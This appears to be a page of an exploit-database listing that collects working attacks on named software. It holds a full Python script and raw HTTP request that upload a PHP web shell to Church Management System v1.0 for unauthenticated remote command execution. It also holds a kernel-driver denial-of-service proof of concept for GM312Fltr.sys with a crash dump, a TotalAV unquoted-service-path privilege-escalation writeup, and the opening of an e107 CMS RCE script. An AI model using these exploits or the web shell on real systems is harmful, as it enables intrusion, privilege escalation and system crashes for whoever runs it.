''' POST /church_management/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------91105564325608762312322546550 Content-Length: 859 Origin: http://localhost Connection: close Referer: http://localhost/church_management/admin/?page=user Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="id" 1 -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="firstname" Adminstrator -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="lastname" Admin -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="username" admin -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="password" -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="img"; filename="phpinfo.php" Content-Type: application/octet-stream <?php echo phpinfo(); ?> -----------------------------91105564325608762312322546550-- ''' # ` Image uploader is renaming your payload using the following function. # strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name']; # you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler # and print this function to get the value. e.g: <?php echo strtotime(date('y-m-d H:i')); ?> Output: 1632085200 # concate output with your playload name like this 1632085200_phpinfo.php # 4. Communicate with the webshell at 'uploads/1632085200_phpinfo.php?cmd=dir' using GET Requests. 
# RCE via executing exploit: # Step 1: run the exploit in python with this command: python3 CMS-RCEv1.0.py # Step 2: Input the URL of the vulnerable application: Example: http://localhost/church_management/ import requests, sys, urllib, re import datetime from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL print(Style.BRIGHT+" Church Management System v1.0") print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) print(header) print(r""" .----------. .-''-. / / . __ __ ___ .' .-. ) / ______.' .'| | |/ `.' `. / .' / / / /_ .' | | .-. .-. ' (_/ / / / '''--. < | __ __ | | | | | | ,.----------. / / '___ `. | | ____ .:--.'. .:--.'. | | | | | |// \ / / `'. | | | \ .' / | \ | / | \ || | | | | |\\ /. ' ) | | |/ . `" __ | | `" __ | || | | | | | `'----------'/ / _.-')......-' / | /\ \ .'.''| | .'.''| ||__| |__| |__| .' ' _.'.-'' \ _..'` | | \ \ / / | |_/ / | |_ / /.-'_.' '------''' ' \ \ \ \ \._,\ '/\ \._,\ '/ / _.' '------' '---'`--' `" `--' `" ( _.-' abdullahkhawaja.com """) GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults #Create a new session #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} LINK=input("Enter URL of The Vulnarable Application : ") def webshell(LINK, session): try: WEB_SHELL = LINK+'uploads/'+filename getdir = {'cmd': 'echo %CD%'} r2 = session.get(WEB_SHELL, params=getdir, verify=False) status = r2.status_code if status != 200: print (Style.BRIGHT+Fore.RED+"[!] 
"+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) r2.raise_for_status() print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') cwd = re.findall('[CDEF].*', r2.text) cwd = cwd[0]+"> " term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET while True: thought = input(term) command = {'cmd': thought} r2 = requests.get(WEB_SHELL, params=command, verify=False) status = r2.status_code if status != 200: r2.raise_for_status() response2 = r2.text print(response2) except: print("\r\nExiting.") sys.exit(-1) #Creating a PHP Web Shell phpshell = { 'img': ( 'shell.php', '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 'application/octet-stream', {'Content-Disposition': 'form-data'} ) } # Defining value for form data data = {'id':'1', 'firstname':'Adminstrator', 'lastname':'Admin','username':'admin','password':''} def id_generator(): x = datetime.datetime.now() date_string = x.strftime("%y-%m-%d %H:%M") date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") timestamp = datetime.datetime.timestamp(date) file = int(timestamp) final_name = str(file)+'_shell.php' return final_name filename = id_generator() #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+'classes/Users.php?f=save', cookies=cookies, files=phpshell, data=data) shell_upload = True if("Undefined index: id in" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET) #Executing The Webshell webshell(LINK, s)
  16. # Exploit Title: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) # Date: 2021/04/07 # Exploit Author: Quadron Research Lab # Version: all version # Tested on: Windows 10 x64 HUN/ENG Professional # Vendor: https://www.yenkee.eu/gaming-mouse-hornet-aim/yms-3029 # Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/GM312Fltr import ctypes, sys from ctypes import * import io from itertools import product from sys import argv devicename = "GM312Fltr" ioctl = 0x22245C ioctl_list = ''' 0x22245C 0x222440 0x222441 0x222400 0x222404 0x222408 0x222420 0x222424 0x222448 0x222450 0x22245c 0x222460 ''' kernel32 = windll.kernel32 hevDevice = kernel32.CreateFileA("\\\\.\\GM312Fltr", 0xC0000000, 0, None, 0x3, 0, None) if not hevDevice or hevDevice == -1: print ("Not Win! Sorry!") else: print ("OPENED!") buf = 'A' * 2000 bufLength = 2000 kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None) [Bugcheck Analysis] Fatal System Error 0x000000f7 (0xBEBEA1CAEAF0A2C1,0x0000F80736BC1742,0xFFFF07F8C943E8BD,0x0000000000000000) Break instruction exception - code 80000003 (first chance) nt!DbgBreakPointWithStatus fffff807`2e1feb90 cc int 3 0 kd !analyze Connected to Windows 10 19041 x64 target at (Mon Jun 14 204816.370 2021 (UTC + 200)), ptr64 TRUE Loading Kernel Symbols ............................................................... ................................................................ ........................ Press ctrl-c (cdb, kd, ntsd) or ctrl-break (windbg) to abort symbol loads that take too long. Run !sym noisy before .reload to track down problems loading symbols. ........................................ ............................. Loading User Symbols ............................................. Loading unloaded module list ........ Bugcheck Analysis DRIVER_OVERRAN_STACK_BUFFER (f7) A driver has overrun a stack-based buffer. 
This overrun could potentially allow a malicious user to gain control of this machine. DESCRIPTION A driver overran a stack-based buffer (or local variable) in a way that would have overwritten the function's return address and jumped back to an arbitrary address when the function returned. This is the classic buffer overrun hacking attack and the system has been brought down to prevent a malicious user from gaining complete control of it. Do a kb to get a stack backtrace -- the last routine on the stack before the buffer overrun handlers and bugcheck call is the one that overran its local variable(s). Arguments Arg1 bebea1caeaf0a2c1, Actual security check cookie from the stack Arg2 0000f80736bc1742, Expected security check cookie Arg3 ffff07f8c943e8bd, Complement of the expected security check cookie Arg4 0000000000000000, zero Debugging Details ------------------ BUGCHECK_CODE f7 BUGCHECK_P1 bebea1caeaf0a2c1 BUGCHECK_P2 f80736bc1742 BUGCHECK_P3 ffff07f8c943e8bd BUGCHECK_P4 0 PROCESS_NAME pythonw.exe SYMBOL_NAME GM312Fltr+e1e MODULE_NAME GM312Fltr IMAGE_NAME GM312Fltr.sys FAILURE_BUCKET_ID 0xF7_MISSING_GSFRAME_STACKPTR_ERROR_GM312Fltr!unknown_function FAILURE_ID_HASH {b8e05604-2a11-789a-ad29-fc4916710f2d} Followup MachineOwner --------- 0 kd kb RetAddr Args to Child Call Site fffff807`2e312d12 fffff807`344a4ae0 fffff807`2e17d000 00000000`00000000 00000000`00000000 nt!DbgBreakPointWithStatus fffff807`2e3122f6 00000000`00000003 fffff807`344a4ae0 fffff807`2e20bbc0 00000000`000000f7 nt!KiBugCheckDebugBreak+0x12 fffff807`2e1f6df7 fffff807`344a5210 00000000`00000000 fffff807`36bc18c8 fffff807`344a51a8 nt!KeBugCheck2+0x946 fffff807`36bc0e1e 00000000`000000f7 bebea1ca`eaf0a2c1 0000f807`36bc1742 ffff07f8`c943e8bd nt!KeBugCheckEx+0x107 fffff807`36bc0ea7 fffff807`344a5210 00000000`00000000 fffff807`344a5748 fffff807`344a5720 GM312Fltr+0xe1e fffff807`2e1ffbaf fffff807`36bc0e94 00000000`00000000 00000000`00000000 00000000`00000000 GM312Fltr+0xea7 fffff807`2e087547 
fffff807`344a5710 00000000`00000000 ffffe08b`abb1e380 fffff807`36bc0b5d nt!RtlpExecuteHandlerForException+0xf fffff807`2e086136 ffffe08b`abb1dcf8 fffff807`344a5e20 ffffe08b`abb1dcf8 ffffe30a`242183c0 nt!RtlDispatchException+0x297 fffff807`2e1f7b82 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 nt!KiDispatchException+0x186 fffff807`2e1f7b50 fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 nt!KxExceptionDispatchOnExceptionStack+0x12 fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 00000000`00000246 nt!KiExceptionDispatchOnExceptionStackContinue fffff807`2e204ae0 ffffe30a`1ce27c00 ffffe30a`1ce21010 00000000`00000000 00000000`00000000 nt!KiExceptionDispatch+0x125 fffff807`2e1fe0c7 fffff807`2aab9180 000fa40d`b19b3dfe ffffe30a`27381080 fffff807`2eaea710 nt!KiGeneralProtectionFault+0x320 fffff807`2e1fda76 7fffe30a`29e4bb10 00000000`ffffffff 00000000`00000000 00000000`00000000 nt!SwapContext+0x377 fffff807`2e00c970 ffffe30a`00000006 00000000`ffffffff 00000000`00000000 ffffe30a`24218498 nt!KiSwapContext+0x76 fffff807`2e00be9f ffffe30a`27381080 fffff807`36b819b6 ffffe08b`abb1e270 00000000`00000000 nt!KiSwapThread+0x500 fffff807`2e00b743 ffffe30a`00000034 00000000`00000000 ffffe30a`23c6d800 ffffe30a`273811c0 nt!KiCommitThreadWait+0x14f fffff807`36bc0ca2 ffffe08b`abb1e350 fffff807`00000000 00000000`00000000 00000000`00004100 nt!KeWaitForSingleObject+0x233 fffff807`36bc0b5d ffffffff`ff676980 00000000`00000000 00000000`00000bb8 fffff807`35142017 GM312Fltr+0xca2 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 GM312Fltr+0xb5d 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 
41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 
0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 
41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 
41414141`41414141 00000000`0020027f 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 0x41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0x41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 0x41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 0x41414141`41414141 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 0x20027f 00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 00000000`00000000 MSVCR90!pow+0x4e0
  17. # Exploit Title: TotalAV 5.15.69 - Unquoted Service Path # Date: 22/09/2021 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://www.totalav.com # Software Link: https://download.totalav.com/windows/beta-trial or https://install.protected.net/windows/cdn3/5.15.69/TotalAV.exe # Version: 5.15.69 # Tested on: Windows 10 Pro 20H2 and 21H1 x64 The PC Security Management Service, PC Security Management Monitoring Service, and Anti-Malware SDK Protected Service services from TotalAV version 5.15.69 are affected by an unquoted service path (CWE-428) vulnerability which may allow a user to gain SYSTEM privileges since they are all running with higher privileges. To exploit the vulnerability, it is possible to place executable(s) following the path of the unquoted string. Affected executable services: SecurityService, SecurityServiceMonitor, AMSProtectedService: PC Security Management Service SecurityService C:\Program Files (x86)\TotalAV\SecurityService.exe Auto PC Security Management Monitoring Service SecurityServiceMonitor C:\Program Files (x86)\TotalAV\SecurityService.exe --monitor Auto Anti-Malware SDK Protected Service AMSProtectedService C:\Program Files (x86)\TotalAV\savapi\elam_ppl\amsprotectedservice.exe Auto C:\Users\user>sc qc SecurityService [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: SecurityService TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files(x86)\TotalAV\SecurityService.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : PC Security Management Service DIPENDENZE : SERVICE_START_NAME : LocalSystem C:\Users\user>sc qc SecurityServiceMonitor [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: SecurityServiceMonitor TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files(x86)\TotalAV\SecurityService.exe --monitor GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : PC Security 
Management Monitoring Service DIPENDENZE : SERVICE_START_NAME : LocalSystem C:\Users\user>sc qc AMSProtectedService [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: AMSProtectedService TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files (x86)\TotalAV\savapi\elam_ppl\amsprotectedservice.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : Anti-Malware SDK Protected Service DIPENDENZE : SERVICE_START_NAME : LocalSystem
  18. # Exploit Title: e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated) # Date: 21-09-2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Vendor Homepage: https://e107.org/ # Software Link: https://e107.org/download # Version: 2.3.0 # Category: Webapps # Tested on: Linux/Windows # e107 is a free website content management system # Includes an endpoint that allows remote access # Theme page is misconfigured, causing security vulnerability # User information with sufficient permissions is required. # The contents of the upload "malicious.zip" file must be too long to read to bypass some security measures! # Example: python3 exploit.py -u http://example.com -l admin -p Admin123 # python3 exploit.py -h from time import sleep import requests import argparse def main(): parser = argparse.ArgumentParser( description='e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)' ) parser.add_argument('-u', '--host', type=str, required=True) parser.add_argument('-l', '--login', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) args = parser.parse_args() print("\ne107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)", "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") 